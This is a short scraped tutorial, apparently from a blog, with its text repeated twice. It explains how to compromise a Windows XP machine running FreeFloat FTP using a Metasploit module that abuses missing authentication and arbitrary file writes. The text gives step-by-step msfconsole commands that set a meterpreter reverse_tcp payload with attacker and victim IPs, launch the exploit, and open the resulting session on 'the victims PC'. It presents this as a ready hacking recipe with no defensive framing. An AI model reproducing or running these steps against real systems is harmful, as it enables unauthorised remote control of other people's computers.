This Metasploit module abuses multiple issues in FreeFloat: 1. No credential is actually needed to login; 2. User’s default path is in C:\, and this cannot be changed; 3. User can write to anywhere on the server’s file system. As a result of these poor implementations, a malicious user can just log in and then upload files, and let WMI (Management Instrumentation service) to execute the payload uploaded.
Victim PC : Windows XP
Open backtrack terminal type msfconsole

Now type use exploit/windows/ftp/freefloatftp_webm
msf exploit ( freefloatftp_webm )> set payload windows/meterpreter/reverse_tcp
msf exploit ( freefloatftp_webm )> set lhost 192.168.0.109 (IP of Local Host)
msf exploit ( freefloatftp_webm )> set rhost 192.168.0.108 (Address of remote machine)
msf exploit ( freefloatftp_webm )> exploit

Now you have access to the victims PC. Use “ Sessions -l ” and the Session number to connect to the session. And Now Type “ sessions -i ID “


Read more: http://youthinfoadda.blogspot.com/2013/05/hack-remote-pc-using-free-float-ftp.html#ixzz2SWNUwZRF
Exploit Targets
FreeFloatRequirement
Attacker : Backtrack 5Victim PC : Windows XP
Open backtrack terminal type msfconsole

Now type use exploit/windows/ftp/freefloatftp_webm
msf exploit ( freefloatftp_webm )> set payload windows/meterpreter/reverse_tcp
msf exploit ( freefloatftp_webm )> set lhost 192.168.0.109 (IP of Local Host)
msf exploit ( freefloatftp_webm )> set rhost 192.168.0.108 (Address of remote machine)
msf exploit ( freefloatftp_webm )> exploit

Now you have access to the victims PC. Use “ Sessions -l ” and the Session number to connect to the session. And Now Type “ sessions -i ID “


Read more: http://youthinfoadda.blogspot.com/2013/05/hack-remote-pc-using-free-float-ftp.html#ixzz2SWNUwZRF